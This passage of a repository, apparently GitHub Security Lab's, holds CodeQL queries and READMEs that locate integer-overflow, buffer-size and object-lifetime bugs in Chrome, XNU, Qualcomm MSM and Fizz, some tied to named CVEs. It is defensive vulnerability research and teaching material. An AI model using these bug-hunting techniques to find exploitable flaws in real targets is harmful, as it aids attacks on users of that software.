    compare.getAnOperand() = access and compare.getAnOperand() = add
  ) and
  add.getAnOperand() = var.getAnAccess()
}
9 |
// Step 3: of the checks on narrow variables, report those where no conversion
// applied to the sum brings it back down to a narrow type. The comparison is
// then made on the widened sum, which cannot have wrapped, so the check does
// not detect the overflow of `var` it was meant to guard against.
from LocalScopeVariable var, AddExpr add
where
  exists(RelationalOperation compare | overflowCheck(var, add, compare)) and
  var.getType().getSize() < 4 and
  not exists(Conversion conv | conv = add.getConversion+() | conv.getType().getSize() < 4)
select add, "Bad overflow check on variable of type " + var.getUnderlyingType()
15 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/Chrome/field.qll:
--------------------------------------------------------------------------------
1 | import cpp
2 | import common
3 | import collections
4 | import pointers.raw_ptr
5 |
/**
 * Gets an expression whose value is stored into the field `f`, in a broad
 * sense: a value the library already reports through `getAnAssignedValue()`,
 * the right-hand side of a `GeneralAssignment` to `f`, an argument of a call
 * classified as `AddToCollection` or `ManagedPtrSetFunction` whose qualifier
 * is `f`, or the right-hand side of an assignment through `operator[]` on `f`.
 */
Expr generalAssignValue(Field f) {
  // Values the standard CodeQL library already considers assigned to `f`.
  result = f.getAnAssignedValue()
  or
  // `f = result`, for every assignment form recognised by `GeneralAssignment`.
  exists(GeneralAssignment assign |
    assign.getLValue() = f.getAnAccess() and assign.getRValue() = result
  )
  or
  // An element added to a collection stored in `f` (target is an `AddToCollection`).
  exists(FunctionCall call |
    call.getTarget() instanceof AddToCollection and
    getQualifier(call) = f.getAnAccess() and
    result = call.getAnArgument()
  )
  or
  // A value handed to the setter of a managed pointer stored in `f`.
  exists(FunctionCall call |
    call.getTarget() instanceof ManagedPtrSetFunction and
    getQualifier(call) = f.getAnAccess() and
    result = call.getAnArgument()
  )
  or
  // `f[i] = result` via an overloaded `operator[]` whose qualifier is `f`.
  exists(FunctionCall indexer, GeneralAssignment assign |
    indexer.getTarget().hasName("operator[]") and
    getQualifier(indexer) = f.getAnAccess() and
    assign.getLValue() = indexer and
    assign.getRValue() = result
  )
}
35 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/Chrome/qlpack.yml:
--------------------------------------------------------------------------------
1 | name: chrome-ql
2 | version: 0.0.0
3 | libraryPathDependencies: codeql-cpp
4 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/Chrome/queries/callback_unretained.ql:
--------------------------------------------------------------------------------
1 | /**
2 | * @name callback_unretained
3 | * @description For each callback, get the types that are unretained in the callback.
4 | * @kind problem
5 | * @problem.severity warning
6 | */
7 |
8 | import cpp
9 | import callbacks
10 | import object_lifetime.obj_lifetime
11 |
// Report, for each callback sink, every type that is captured unretained by the
// callback. `CallbackSinks` can be swapped for a more specific sink class to
// narrow the investigation. Two heuristic exclusions are applied: callbacks
// passed to `set_connection_error_handler`, and callbacks in `*test-utils*`
// files. Types modelled as `Singleton` or `OwnedByBrowserMainLoop` are dropped
// as well (presumably because such objects outlive any callback — see
// object_lifetime.obj_lifetime).
from CallbackSinks sink, Type unretainedType
where
  unretainedType = sink.getAnUnretainedType() and
  not unretainedType instanceof Singleton and
  not unretainedType instanceof OwnedByBrowserMainLoop and
  not sink.asExpr().getFile().getBaseName().matches("%test-utils%") and
  not exists(FunctionCall fc | fc.getAnArgument() = sink.asExpr() |
    fc.getTarget().hasName("set_connection_error_handler")
  )
select sink, unretainedType
23 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/Chrome/queries/callback_unretained_field.ql:
--------------------------------------------------------------------------------
1 | /**
2 | * @name callback_unretained_field
3 | * @description For each callback field, get the types that are unretained in the callback. (specialized version of callback_unretained)
4 | * @kind problem
5 | * @problem.severity warning
6 | */
7 |
8 | import cpp
9 | import callbacks
10 | import object_lifetime.obj_lifetime
11 |
// Specialised form of callback_unretained: the callback must be a value stored
// into a field `f` (see `generalAssignValue`), and `f` is reported alongside
// the sink and the unretained type. The same heuristic exclusions apply:
// callbacks passed to `set_connection_error_handler`, callbacks in
// `*test-utils*` files, and types modelled as `Singleton` or
// `OwnedByBrowserMainLoop`.
from CallbackFieldSink sink, Field f, Type unretainedType
where
  sink.asExpr() = generalAssignValue(f) and
  unretainedType = sink.getAnUnretainedType() and
  not unretainedType instanceof Singleton and
  not unretainedType instanceof OwnedByBrowserMainLoop and
  not sink.asExpr().getFile().getBaseName().matches("%test-utils%") and
  not exists(FunctionCall fc | fc.getAnArgument() = sink.asExpr() |
    fc.getTarget().hasName("set_connection_error_handler")
  )
select f, sink, unretainedType
23 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/Facebook_Fizz_CVE-2019-3560/NarrowingConversions.ql:
--------------------------------------------------------------------------------
1 | /**
2 | * @name Narrowing conversions
3 | * @description Find all narrowing conversions from a larger integer type,
4 | * such as uint32_t, to a smaller integer type, such as uint8_t.
5 | * @kind problem
6 | */
7 |
8 | import cpp
9 | import semmle.code.cpp.ir.IR
10 |
/**
 * Holds if `i` converts its operand to a result stored in fewer bytes than the
 * operand itself, i.e. the conversion may discard high-order bits.
 */
predicate isNarrowingConversion(ConvertInstruction i) {
  exists(int inputSize, int outputSize |
    inputSize = i.getUnary().getResultSize() and
    outputSize = i.getResultSize()
  |
    outputSize < inputSize
  )
}
15 |
// Report every narrowing conversion; the alert names the operand type and the
// (smaller) result type so a reader can judge how many bits may be lost.
from ConvertInstruction conv
where isNarrowingConversion(conv)
select conv,
  "Narrowing conversion from " + conv.getUnary().getResultType() + " to " +
    conv.getResultType() + "."
22 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/Facebook_Fizz_CVE-2019-3560/README.md:
--------------------------------------------------------------------------------
1 | # Facebook Fizz integer overflow vulnerability (CVE-2019-3560)
2 |
3 | Use [this snapshot](https://github.com/github/securitylab/releases/download/facebook-codeql-database/facebookincubator_fizz_cpp-srcVersion_c69ad1baf3f04620393ebadc3eedd130b74f4023-dist_odasa-lgtm-2019-01-13-f9dca2a-universal.zip) for the demo.
4 |
5 | [Fizz](https://github.com/facebookincubator/fizz) contained a remotely triggerable infinite loop. For more details about the bug, see this [blog post](https://securitylab.github.com/research/facebook-fizz-CVE-2019-3560). A proof-of-concept exploit is available [here](https://github.com/github/securitylab/tree/95c0bcc670f3b3d98a4d578f8993f8138092b94f/SecurityExploits/Facebook/Fizz/CVE-2019-3560).
6 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/MinIntNegate/.gitignore:
--------------------------------------------------------------------------------
1 | MinIntNegateDB
2 | test.o
3 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/MinIntNegate/00_MinIntNegate.ql:
--------------------------------------------------------------------------------
1 | /**
2 | * @name 00_MinIntNegate
3 | * @description Negating MIN_INT is an integer overflow
4 | * @kind problem
5 | * @id cpp/min-int-negate
6 | * @problem.severity warning
7 | */
8 |
9 | import cpp
10 | import semmle.code.cpp.controlflow.Guards
11 |
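// Find this pattern:
//
// ```
// if (x < 0) {
//   x = -x;
// }
// ```
//
// If the value of `x` is `0x80000000` then this will not make the value of `x` positive.
//
// `v` is any `Variable`, so field accesses such as `s->myfield` are matched
// too; the later steps in this directory refine that.
from GuardCondition guard, BasicBlock block, UnaryMinusExpr unaryMinus, Variable v
where
  // `v < 0` ...
  guard.(LTExpr).getLeftOperand() = v.getAnAccess() and
  guard.(LTExpr).getRightOperand().getValue().toInt() = 0 and
  // ... controls `block` on its true branch ...
  guard.controls(block, true) and
  // ... and `block` evaluates `-v`.
  block.contains(unaryMinus) and
  unaryMinus.getOperand() = v.getAnAccess()
select unaryMinus, "If the value of $@ is MinInt then this assignment will not make it positive", v,
  v.getName()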
30 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/MinIntNegate/01_MinIntNegate.ql:
--------------------------------------------------------------------------------
1 | /**
2 | * @name 01_MinIntNegate
3 | * @description Negating MIN_INT is an integer overflow
4 | * @kind problem
5 | * @id cpp/min-int-negate
6 | * @problem.severity warning
7 | */
8 |
9 | import cpp
10 | import semmle.code.cpp.controlflow.Guards
11 |
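// The previous query had an incorrect result at test.cpp, line 20:
//
//   if (s->myfield < 0) {
//     s->myfield = -t->myfield;
//   }
//
// The problem is that the query used `Variable`, which includes fields, and
// a field access is related to its `Variable` regardless of the qualifier:
// `s->myfield` and `t->myfield` are both accesses of the same field.
// So here we restrict the query to use `LocalScopeVariable` instead
// (locals and parameters only).
//
// The `from` clause declares only the variables the query uses: an
// unconstrained `Expr` would range over every expression in the database.
from GuardCondition guard, BasicBlock block, UnaryMinusExpr unaryMinus, LocalScopeVariable v
where
  // The guard is a comparison `v < 0` ...
  guard.(LTExpr).getLeftOperand() = v.getAnAccess() and
  guard.(LTExpr).getRightOperand().getValue().toInt() = 0 and
  // ... which controls the block containing the negation when it is true ...
  guard.controls(block, true) and
  block.contains(unaryMinus) and
  // ... and the negated expression is an access of the same local variable.
  unaryMinus.getOperand() = v.getAnAccess()
select unaryMinus, "If the value of $@ is MinInt then this assignment will not make it positive", v,
  v.getName()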
30 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/MinIntNegate/02_MinIntNegate.ql:
--------------------------------------------------------------------------------
1 | /**
2 | * @name 02_MinIntNegate
3 | * @description Negating MIN_INT is an integer overflow
4 | * @kind problem
5 | * @id cpp/min-int-negate
6 | * @problem.severity warning
7 | */
8 |
9 | import cpp
10 | import semmle.code.cpp.controlflow.Guards
11 | import semmle.code.cpp.valuenumbering.GlobalValueNumbering
12 |
// 01_MinIntNegate removed the spurious `-t->myfield` result of the first
// query but, by restricting `v` to `LocalScopeVariable`, it also stopped
// reporting the genuine bug at test.cpp, line 14:
//
//   if (s->myfield < 0) {
//     s->myfield = -s->myfield;
//   }
//
// `s->myfield` is a field access, not a local variable. Rather than
// reasoning about variables at all, this version asks whether the
// expression compared against zero and the expression being negated have
// the same global value number (GVN), i.e. are known to compute the same
// value. This covers locals, fields and more complex expressions alike.
from GuardCondition guard, BasicBlock block, UnaryMinusExpr unaryMinus, Expr guarded, Expr negated
where
  // The condition is `guarded < 0` ...
  exists(LTExpr lt | lt = guard |
    lt.getLeftOperand() = guarded and
    lt.getRightOperand().getValue().toInt() = 0
  ) and
  // ... the negation is only reached when that condition holds ...
  unaryMinus.getOperand() = negated and
  block.contains(unaryMinus) and
  guard.controls(block, true) and
  // ... and both sides denote the same value.
  globalValueNumber(guarded) = globalValueNumber(negated)
select unaryMinus, "If the value of $@ is MinInt then this assignment will not make it positive",
  negated, negated.toString()
35 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/MinIntNegate/03_MinIntNegate.ql:
--------------------------------------------------------------------------------
1 | /**
2 | * @name 03_MinIntNegate
3 | * @description Negating MIN_INT is an integer overflow
4 | * @kind problem
5 | * @id cpp/min-int-negate
6 | * @problem.severity warning
7 | */
8 |
9 | import cpp
10 | import semmle.code.cpp.controlflow.Guards
11 | import semmle.code.cpp.valuenumbering.GlobalValueNumbering
12 |
// The previous query only worked for `x < 0` and not for the
// equivalent `0 > x`. It's easier to handle both if we refactor
// the logic into a separate predicate.

/**
 * Holds if `cond` is a strict comparison that is true exactly when
 * `lhs < rhs`: either `lhs < rhs` itself or the mirrored `rhs > lhs`.
 * Non-strict comparisons (`<=`, `>=`) are not matched here.
 */
predicate lessThan(Expr cond, Expr lhs, Expr rhs) {
  exists(RelationalOperation rel | rel = cond |
    // `RelationalOperation` normalises the operand order for us: the
    // "lesser" operand is the left side of `<` and the right side of `>`.
    rel.isStrict() and
    rel.getLesserOperand() = lhs and
    rel.getGreaterOperand() = rhs
  )
}
25 |
from GuardCondition guard, BasicBlock block, UnaryMinusExpr unaryMinus, Expr guarded, Expr negated
where
  // The guard is `guarded < 0`, written either way round (see `lessThan`).
  exists(Expr zero | zero.getValue().toInt() = 0 | lessThan(guard, guarded, zero)) and
  // The negation sits in a block that is only reached when the guard is true ...
  unaryMinus.getOperand() = negated and
  block.contains(unaryMinus) and
  guard.controls(block, true) and
  // ... and negates the same value that was compared against zero.
  globalValueNumber(guarded) = globalValueNumber(negated)
select unaryMinus, "If the value of $@ is MinInt then this assignment will not make it positive",
  negated, negated.toString()
37 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/MinIntNegate/04_MinIntNegate.ql:
--------------------------------------------------------------------------------
1 | /**
2 | * @name 04_MinIntNegate
3 | * @description Negating MIN_INT is an integer overflow
4 | * @kind problem
5 | * @id cpp/min-int-negate
6 | * @problem.severity warning
7 | */
8 |
9 | import cpp
10 | import semmle.code.cpp.controlflow.Guards
11 | import semmle.code.cpp.valuenumbering.GlobalValueNumbering
12 |
// Let's also add support for <= and >=.

/**
 * Holds if `cond` is a relational comparison whose "lesser" side is `lhs`
 * and whose "greater" side is `rhs`, i.e. `lhs < rhs`, `rhs > lhs`,
 * `lhs <= rhs` or `rhs >= lhs`.
 * `isStrict` is true for `<` and `>`, and false for `<=` and `>=`.
 */
predicate lessThan(Expr cond, Expr lhs, Expr rhs, boolean isStrict) {
  exists(RelationalOperation rel | rel = cond |
    // `RelationalOperation` covers exactly `<`, `>`, `<=`, `>=` and
    // already knows which operand is on the lesser side.
    rel.getLesserOperand() = lhs and
    rel.getGreaterOperand() = rhs and
    (if rel.isStrict() then isStrict = true else isStrict = false)
  )
}
36 |
from GuardCondition guard, BasicBlock block, UnaryMinusExpr unaryMinus, Expr guarded, Expr negated
where
  // The guard compares `guarded` against zero on the lesser side. Strictness
  // is irrelevant here: `x <= 0` is still satisfied by MinInt.
  exists(Expr zero | zero.getValue().toInt() = 0 | lessThan(guard, guarded, zero, _)) and
  // The negation is only reached when the guard is true ...
  unaryMinus.getOperand() = negated and
  block.contains(unaryMinus) and
  guard.controls(block, true) and
  // ... and negates the same value that was compared against zero.
  globalValueNumber(guarded) = globalValueNumber(negated)
select unaryMinus, "If the value of $@ is MinInt then this assignment will not make it positive",
  negated, negated.toString()
48 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/MinIntNegate/README.md:
--------------------------------------------------------------------------------
1 | # Unary minus integer overflow gotcha
2 |
3 | This demo is about building a query to find the bug from
4 | [this tweet by Nico Waisman](https://twitter.com/nicowaisman/status/1147178477692608512).
5 |
6 | This is the pattern that we're interested in:
7 |
8 | ```
9 | int32_t Size = user_supplied32();
10 | if(Size < 0) {
11 | Size = -Size;
12 | }
13 | ```
14 |
The developer who wrote this probably thinks that `Size` is now a non-negative number.
But they have forgotten about `INT_MIN` (`0x80000000`, the most negative `int32_t`; the
queries call it `MIN_INT`), which has no positive counterpart: negating it is a signed
integer overflow. In C and C++ that is undefined behaviour, and in practice the value
wraps around and stays negative. So if the subsequent code relies on `Size` being
positive — for example, uses it as a length or an array index — then something could
go badly wrong.
20 |
## Generating a database
22 |
23 | This directory contains a unit test file, [`test.cpp`](test.cpp),
24 | which you can use to create a small database for testing, like this:
25 |
26 | ```
27 | codeql database create MinIntNegateDB --language=cpp --command="g++ -c test.cpp"
28 | ```
29 |
30 | This creates a database in a sub-directory named `MinIntNegateDB`.
31 | You can add this database in the
32 | [CodeQL for VSCode extension](https://github.com/github/vscode-codeql)
33 | by clicking the `+` button.
34 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/OpenSSL-hostname-validation/OpenSSLVerify.qll:
--------------------------------------------------------------------------------
1 | import cpp
2 |
3 | /**
4 | * Common utilities for OpenSSL certificate verification.
5 | */
6 |
/**
 * A call to `SSL_set_verify`, which sets the peer-certificate verification
 * mode (and optional verify callback) for a single `SSL` connection.
 * Matched by callee name only; the signature is not checked.
 */
class SslSetVerifyFunctionCall extends FunctionCall {
  SslSetVerifyFunctionCall() { this.getTarget().getName() = "SSL_set_verify" }
}
10 |
/**
 * A call to `SSL_CTX_set_verify`, which sets the peer-certificate
 * verification mode (and optional verify callback) for every connection
 * created from an `SSL_CTX`. Matched by callee name only.
 */
class SslCtxSetVerifyFunctionCall extends FunctionCall {
  SslCtxSetVerifyFunctionCall() { this.getTarget().getName() = "SSL_CTX_set_verify" }
}
14 |
/**
 * A call to either `SSL_set_verify` or `SSL_CTX_set_verify`, i.e. any
 * place where the verification mode / verify callback is configured,
 * whether per-connection or per-context.
 */
class SslLikeSetVerifyFunctionCall extends FunctionCall {
  SslLikeSetVerifyFunctionCall() {
    exists(string callee |
      callee = "SSL_set_verify" or callee = "SSL_CTX_set_verify"
    |
      this.getTarget().hasName(callee)
    )
  }
}
21 |
/**
 * A call to `SSL_CTX_set_cert_verify_callback`, which replaces OpenSSL's
 * whole certificate-chain verification with an application callback.
 * Such a callback is an alternative to the `SSL_set_verify` family and is
 * easy to get wrong, so queries treat it as a separate case.
 */
class SslCtxSetCertVerifyCallbackFunctionCall extends FunctionCall {
  SslCtxSetCertVerifyCallbackFunctionCall() {
    this.getTarget().getName() = "SSL_CTX_set_cert_verify_callback"
  }
}
27 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/Qualcomm-MSM-copy_from_user/00_copy_from_user.ql:
--------------------------------------------------------------------------------
1 | /**
2 | * @name Calls to copy_from_user
3 | * @description Find all calls to copy_from_user.
4 | */
5 |
6 | import cpp
7 |
// This first query is essentially equivalent to `grep -r copy_from_user`.
// It has almost 1300 results.
//
// It matches on the name of the resolved callee only: a call produced by a
// macro that expands to `copy_from_user` is included, whereas an indirect
// call through a function pointer has no resolved target and is not.
from FunctionCall call
where call.getTarget().hasName("copy_from_user")
select call
13 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/Qualcomm-MSM-copy_from_user/01_copy_from_user_annotated.ql:
--------------------------------------------------------------------------------
1 | /**
2 | * @name Annotate with types and bounds
3 | * @description Find all calls to copy_from_user and annotates them with their
4 | * type and inferred size bounds.
5 | */
6 |
7 | import cpp
8 | import semmle.code.cpp.rangeanalysis.SimpleRangeAnalysis
9 |
// Let's add some extra columns, so that we can see a bit more information
// about the calls to copy_from_user: the static type of the destination and
// the range that SimpleRangeAnalysis infers for the size argument (on the
// size expression alone; it knows nothing about the destination buffer).
//
// This shows that there are two fairly common patterns:
//   1. copy_from_user into a statically sized buffer, where the upper bound
//      of `sizeArg` shows that it fits.
//   2. copy_from_user into a buffer that was allocated with kzalloc, where
//      the size argument of the kzalloc is the same expression as the size
//      argument of copy_from_user. These calls are safe as long as the two
//      sizes really are the same value (04_safe_malloc.ql checks that with
//      value numbering) and the allocation succeeded.
from FunctionCall call, Expr destArg, Expr sizeArg
where
  call.getTarget().hasName("copy_from_user") and
  call.getArgument(0) = destArg and
  call.getArgument(2) = sizeArg
select call, destArg.getType(), lowerBound(sizeArg), upperBound(sizeArg),
  call.getFile().getRelativePath()
26 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/Qualcomm-MSM-copy_from_user/02_filter_with_upperbound.ql:
--------------------------------------------------------------------------------
1 | /**
2 | * @name Filter with upper bound
3 | * @description This query excludes results that are safe because the upper
4 | * bound of the size argument is less than or equal to the size of
5 | * the destination variable.
6 | */
7 |
8 | import cpp
9 | import semmle.code.cpp.rangeanalysis.SimpleRangeAnalysis
10 |
// Let's filter out results that look like this:
//
// ```
// struct MyStruct s;
// copy_from_user(&s, usrptr, sizeof(s));
// ```
//
// A call is dropped when the destination has pointer type and the size of
// the pointed-to type is at least the largest value the size argument can
// take. If `destArg` is not a pointer, or either size is unknown, the
// comparison has no result and the call is conservatively kept.
//
// Caveat: this trusts the *static* type of the destination. A pointer whose
// declared pointee is large but which actually points into a smaller buffer
// (e.g. after a cast) would be wrongly excluded.
from FunctionCall call, Expr destArg, Expr sizeArg
where
  call.getTarget().hasName("copy_from_user") and
  call.getArgument(0) = destArg and
  call.getArgument(2) = sizeArg and
  not exists(PointerType pt |
    pt = destArg.getType() and
    pt.getBaseType().getSize() >= upperBound(sizeArg)
  )
select call, destArg.getType(), lowerBound(sizeArg), upperBound(sizeArg),
  call.getFile().getRelativePath()
25 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/Qualcomm-MSM-copy_from_user/03_filter_with_upperbound.ql:
--------------------------------------------------------------------------------
1 | /**
2 | * @name Filter with upper bound, also for arrays
3 | * @description This query excludes results that are safe because the upper
4 | * bound of the size argument is less than or equal to the size of
5 | * the destination variable or array.
6 | */
7 |
8 | import cpp
9 | import semmle.code.cpp.rangeanalysis.SimpleRangeAnalysis
10 |
// It turns out that the filter in the previous query does not work for
// array types: when an array is passed directly, `destArg` has `ArrayType`
// rather than `PointerType`, so the pointer-based size check never fires.
// Add a second filter for examples like this:
//
// ```
// struct MyStruct s[2];
// copy_from_user(s, usrptr, sizeof(s));
// ```
//
// `ArrayType.getSize()` is the size of the whole array, which is what the
// copy is bounded by. As before, a call whose destination size or size
// bound is unknown is conservatively kept, and the static type is trusted.
from FunctionCall call, Expr destArg, Expr sizeArg
where
  call.getTarget().hasName("copy_from_user") and
  call.getArgument(0) = destArg and
  call.getArgument(2) = sizeArg and
  // Pointer destination: pointee at least as large as the maximum size.
  not exists(PointerType pt |
    pt = destArg.getType() and
    pt.getBaseType().getSize() >= upperBound(sizeArg)
  ) and
  // Array destination: whole array at least as large as the maximum size.
  not exists(ArrayType at |
    at = destArg.getType() and
    at.getSize() >= upperBound(sizeArg)
  )
select call, destArg.getType(), lowerBound(sizeArg), upperBound(sizeArg),
  call.getFile().getRelativePath()
28 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/Qualcomm-MSM-copy_from_user/04_safe_malloc.ql:
--------------------------------------------------------------------------------
1 | /**
2 | * @name kzalloc only
3 | * @description If the copy_from_user is preceded by a kzalloc of the correct
4 | * size, then it is safe. To demonstrate, find only those results.
5 | */
6 |
7 | import cpp
8 | import semmle.code.cpp.valuenumbering.GlobalValueNumbering
9 | import semmle.code.cpp.dataflow.DataFlow
10 |
// Let's see if we can detect this pattern:
//
// ```
// buf = kzalloc(size, GFP_KERNEL);
// ...
// copy_from_user(buf, usrptr, size);
// ```
//
// In the next query, we'll use `safe_malloc` to filter those
// calls out, because they are safe.

/**
 * Holds if `copy_from_user` is a call to `copy_from_user` whose destination
 * is the result of `allocCall`, a call to `kzalloc`, and the size passed to
 * `kzalloc` is the same value as the size passed to `copy_from_user`.
 *
 * The pointer has to reach the destination argument by local (intraprocedural)
 * data flow, and the two sizes are compared by global value number, so a size
 * that is modified between the two calls does not match.
 *
 * Limitations worth knowing about: only `kzalloc` is recognised (other
 * size-first allocators such as `kmalloc` would need to be added), and a
 * failed allocation (NULL return) is not considered here.
 */
predicate safe_malloc(FunctionCall allocCall, FunctionCall copy_from_user) {
  allocCall.getTarget().hasName("kzalloc") and
  copy_from_user.getTarget().hasName("copy_from_user") and
  // The allocated pointer is what gets copied into ...
  DataFlow::localExprFlow(allocCall, copy_from_user.getArgument(0)) and
  // ... and the allocation size is the same value as the copy size.
  globalValueNumber(copy_from_user.getArgument(2)) = globalValueNumber(allocCall.getArgument(0))
}
31 |
// Report each (allocation, copy) pair that `safe_malloc` considers safe,
// so the heuristic can be eyeballed before it is used as a filter.
from FunctionCall copy_from_user, FunctionCall allocCall
where safe_malloc(allocCall, copy_from_user)
select allocCall, copy_from_user
35 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/Qualcomm-MSM-copy_from_user/README.md:
--------------------------------------------------------------------------------
1 | [Blog post](https://securitylab.github.com/research/stack-buffer-overflow-qualcomm-msm/)
2 |
3 | [Snapshot for this demo](https://github.com/github/securitylab/releases/download/qualcomm-msm-codeql-database/msm-4.4-revision-2017-May-07--08-33-56.zip)
4 |
The blog post was written before we had the C++ dataflow library, so these demo queries are a bit different from the ones in the blog post.
6 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/README.md:
--------------------------------------------------------------------------------
1 |
2 | ## Useful CodeQL Queries
3 |
- [ChakraCore bad overflow check](ChakraCore-bad-overflow-check/)
5 | - [XNU NFS Boot vulnerability](XNU_NFS_Boot_CVE-2018-4136_CVE-2018-4160/)
6 | - [Facebook Fizz Denial of Service](Facebook_Fizz_CVE-2019-3560/)
7 | - [XNU ICMP Denial of Service](XNU_icmp_error_CVE-2018-4407/)
8 | - [Qualcomm MSM copy_from_user vulnerability](Qualcomm-MSM-copy_from_user/)
9 | - [XNU packet mangler](XNU_packet-mangler_CVE-2018-4249/)
10 | - [RSyslog](rsyslog_CVE-2018-1000140/)
- [libjpeg-turbo out-of-bounds access](libjpeg-turbo-oob)
12 | - [XNU DTrace](XNU_DTrace_CVE-2017-13782)
13 | - [libssh2](libssh2_eating_error_codes)
14 |
15 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/XNU_DTrace_CVE-2017-13782/README.md:
--------------------------------------------------------------------------------
1 | [Blog post](https://securitylab.github.com/research/apple-xnu-dtrace-CVE-2017-13782/)
2 |
3 | Bug was fixed in [macOS High Sierra 10.13.1](https://support.apple.com/en-us/HT208221).
4 |
5 | [This snapshot](https://github.com/github/securitylab/releases/download/xnu-codeql-database/XNU-revision-2017-June-13--15-52-38.zip) (macOS 10.13) has the bug.
6 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/XNU_NFS_Boot_CVE-2018-4136_CVE-2018-4160/BCopyNegativeSize.ql:
--------------------------------------------------------------------------------
1 | /**
2 | * @name bcopy with negative size
3 | * @description Calling bcopy with a negative size argument will crash the
4 | * kernel due to a negative integer overflow.
5 | * @kind path-problem
6 | * @problem.severity warning
7 | * @id apple-xnu/cpp/bcopy-negative-size
8 | */
9 |
10 | import cpp
11 | import semmle.code.cpp.dataflow.TaintTracking
12 | import semmle.code.cpp.rangeanalysis.SimpleRangeAnalysis
13 | import DataFlow::PathGraph
14 |
/**
 * Taint configuration: from data returned by `mbuf_data` to a size argument
 * of `__builtin___memmove_chk` that may be negative.
 */
class MyCfg extends TaintTracking::Configuration {
  MyCfg() { this = "MyCfg" }

  /**
   * Sources: the result of any call to `mbuf_data`, i.e. a pointer into the
   * payload of an `mbuf`, which is assumed to hold attacker-controlled bytes.
   */
  override predicate isSource(DataFlow::Node source) {
    exists(FunctionCall c | c = source.asExpr() | c.getTarget().hasName("mbuf_data"))
  }

  /**
   * Sinks: the size argument (index 2) of `__builtin___memmove_chk` — presumably
   * what `bcopy` expands to in the XNU headers this query was written against,
   * given the query name; verify against the snapshot — where range analysis
   * cannot rule out a negative value. A negative signed size converted to
   * `size_t` becomes a huge length, so the copy runs far past the destination.
   */
  override predicate isSink(DataFlow::Node sink) {
    exists(FunctionCall c |
      c.getArgument(2) = sink.asExpr() and
      c.getTarget().hasName("__builtin___memmove_chk") and
      lowerBound(sink.asExpr()) < 0
    )
  }
}
31 |
// Report every tainted path from an `mbuf_data` result to a possibly
// negative size argument; the alert is placed on the sink.
from MyCfg cfg, DataFlow::PathNode source, DataFlow::PathNode sink
where cfg.hasFlowPath(source, sink)
select sink, source, sink, "The size argument of bcopy might be negative."
35 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/XNU_NFS_Boot_CVE-2018-4136_CVE-2018-4160/README.md:
--------------------------------------------------------------------------------
1 | [Blog post](https://securitylab.github.com/research/apple-xnu-nfs-boot/)
2 |
3 | Bug was fixed in [macOS High Sierra 10.13.4](https://support.apple.com/en-gb/HT208692).
4 |
5 | [This snapshot](https://github.com/github/securitylab/releases/download/xnu-macos10.13.3-codeql-database/xnu-4570.41.2_macOS-10.13.3_Semmle-1.16.1.zip) has the bug.
6 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/XNU_icmp_error_CVE-2018-4407/00_mbuf_copydata_tainted_size.ql:
--------------------------------------------------------------------------------
1 | /**
2 | * @name 00 mbuf copydata with tainted size
3 | * @description Calling m_copydata with an untrusted size argument
4 | * could cause a buffer overflow.
5 | * @kind path-problem
6 | * @problem.severity warning
7 | * @id apple-xnu/cpp/mbuf-copydata-with-tainted-size
8 | */
9 |
10 | /*
11 | * This query is explained in detail in this blog post:
12 | *
13 | * https://securitylab.github.com/research/apple-xnu-icmp-error-CVE-2018-4407/
14 | *
15 | * It is based on the assumption that the function `m_mtod`, which returns
16 | * a pointer to the data stored in an `mbuf`, often returns a buffer
17 | * containing untrusted data.
18 | *
19 | * The query has multiple results. The interesting result is the one in
20 | * `ip_icmp.c`.
21 | */
22 |
23 | import cpp
24 | import semmle.code.cpp.dataflow.TaintTracking
25 | import DataFlow::PathGraph
26 |
/**
 * Taint configuration: from the data pointer returned by `m_mtod` to the
 * length argument of any `*copydata` call.
 */
class Config extends TaintTracking::Configuration {
  Config() { this = "mbuf copydata with tainted size" }

  /**
   * Sources: the return value of any call to `m_mtod`. This over-approximates:
   * not every `mbuf` holds untrusted data (see the README), which is why the
   * follow-up queries look for the real origin of the packet.
   */
  override predicate isSource(DataFlow::Node source) {
    exists(FunctionCall c | c = source.asExpr() | c.getTarget().hasName("m_mtod"))
  }

  /**
   * Sinks: the third argument (index 2, the length) of any call whose callee
   * name ends in `copydata`, e.g. `m_copydata`. The match is by name suffix,
   * so wrappers with that naming convention are picked up as well.
   */
  override predicate isSink(DataFlow::Node sink) {
    sink.asExpr() =
      any(FunctionCall c | c.getTarget().getName().matches("%copydata")).getArgument(2)
  }
}
40 |
// Report each tainted path; the alert is attached to the sink (the size argument).
from DataFlow::PathNode source, DataFlow::PathNode sink, Config cfg
where cfg.hasFlowPath(source, sink)
select sink, source, sink, "m_copydata with tainted size."
44 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/XNU_icmp_error_CVE-2018-4407/01_paths_to_icmp_error.ql:
--------------------------------------------------------------------------------
1 | /**
2 | * @name 01 Paths from ip_input to icmp_error
3 | * @description Find data-flow paths that lead from ip_input to the first parameter of icmp_error.
4 | * @kind path-problem
5 | * @problem.severity warning
6 | */
7 |
8 | import cpp
9 | import semmle.code.cpp.dataflow.DataFlow
10 | import DataFlow::PathGraph
11 |
12 | /*
